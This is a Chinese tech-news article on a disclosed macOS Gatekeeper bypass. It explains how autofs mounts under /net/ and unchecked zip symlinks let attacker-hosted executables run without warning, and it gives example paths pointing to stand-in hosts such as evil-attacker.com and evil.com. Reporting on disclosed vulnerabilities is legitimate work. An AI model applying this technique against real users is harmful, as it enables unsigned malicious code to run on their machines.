面试一线互联网大厂?那这道题目你必须得会!
研究人员称:macOSGatekeeper安全机制中存在大漏洞
引述外媒报道,安全研究员Filippo Cavallarin已经公开了他所说的绕过macOS的Gatekeeper安全功能的方法。截至上周发布的macOS 10.14.5版本,苹果仍然没有解决旁路问题。
Gatekeeper是一种macOS安全工具,可在下载后立即验证应用程序。这可以防止应用程序在未经用户同意的情 当用户从Mac App Store外部下载应用程序时,Gatekeeper用于检查代码是否已由Apple签名。如果代码尚未签名,则在用户未授予权限的情况下,该应用程序将无法打开。
然而,Cavallarin 在他的博客上写道,Gatekeeper的功能可以被完全绕过。在当前的实现中,Gatekeeper将外部驱动器和网络共享视为“安全位置”。这意味着它允许运行这些位置中包含的任何应用程序而无需再次检查代码。他接着解释说,用户可以“轻易”欺骗安装网络共享驱动器,然后该文件夹中的任何内容都可以通过Gatekeeper。
安全研究员解释说:
第一个合法的功能是automount(aka autofs),它允许用户仅通过访问“特殊”路径(在这种情况下,以“/ net /”开头的任何路径)自动挂载网络共享。
例如,'ls /net/evil-attacker.com/sharedfolder/'将使os使用NFS读取远程主机(evil-attacker.com)上'sharedfolder'的内容。
第二个合法的功能是zip存档可以包含指向任意位置(包括automount enpoints)的符号链接,并且MacOS上负责解压缩zip文件的软件在创建它们之前不会对符号链接执行任何检查。
这是如何工作的一个例子:
为了更好地理解此漏洞利用的工作原理,让我们考虑以下场景:攻击者制作一个zip文件,其中包含一个指向她/他控制的automount端点的符号链接(来自Documents - > /net/evil.com/Documents)并将其发送到受害者。
受害者下载恶意档案,提取并遵循符号链接。
现在,受害者位于受攻击者控制但受Gatekeeper信任的位置,因此任何攻击者控制的可执行文件都可以在没有任何警告的情况下运行。设计Finder的方式(隐藏.app扩展,隐藏标题栏的完整路径)使得这个技术非常有效且难以发现。
Cavallarin表示,他于2月22日向Apple通报了这一漏洞,该公司应该在上周发布macOS 10.14.5时解决这个问题。然而,截至该版本,该漏洞仍未得到解决,Cavallarin称Apple已停止回复他的电子邮件。他正在宣传这个缺陷,因为他给苹果公司提供了90天的窗口。
显示全文
相关文章
-
-
半年内两起空难,波音737还能不能坐?
-
秘籍来了!优化师职业的华丽转身
-
解密奥密克戎BA.2变异株
-
8点1氪|阿里回应“封拼多多员工淘宝账号”;苹果考虑将5GiPhone发布时间推迟数月;罗永浩与抖音正式签约,快手高价竞争但失手
-
淘宝心选,孵化出阿里的“小米生态链”?
-
正确看待阿里电商化改造:流量、GMV和收入模型
-
智慧农贸:小秤也有大“智慧”
-
财报发股价应声大跌:谁吸走了微博的生长氧气?
-
用户体验设计方法论演变:从传统瀑布流到谷歌设计冲刺
-
聚划算占淘宝“六宫格”近一半,下沉只是故事其一
-
iPhone「降速门」诉讼和解,苹果要向用户赔钱了
-
广州琶洲组建算法产业联盟,琶洲实验室当选理事长单位
-
腾讯对BIM下手?建筑师们欢呼了
-
姚劲波笑开颜!58同城净利润大幅提高,转转累计用户已超2亿
-
技术与工具|知网研学:一款强大的文献管理工具
-
前腾讯AILab总经理创业打造“吃鸡”AI:能跑毒也能掩护队友打药
-
下架屏幕时间应用是垄断?苹果这次有点冤
-
为什么现在电脑中还需要命令行
-
天猫双11又破纪录!进口产品中,国人最爱日货
-
企业使用电子合同管理的优势?
-
腾讯音乐给出了「最优解」
-
超10000小时视频、25000多张小票,“空头”发现瑞幸造假的秘密?
-
云模式之诠释-解决社会问题-演变路径
-
热点|特斯拉完全自动驾驶将于5月1日涨价涨幅或为上千美元
-
ISO27018云隐私管理体系申请条件、流程及意义
-
5G网上线首亮相,价格公布后心凉一半,网友:对不起5G,再见
-
混改模范生联通又出大招,CDN市场再添变数
-
选场景降成本,云知声「自主造芯」的思与辨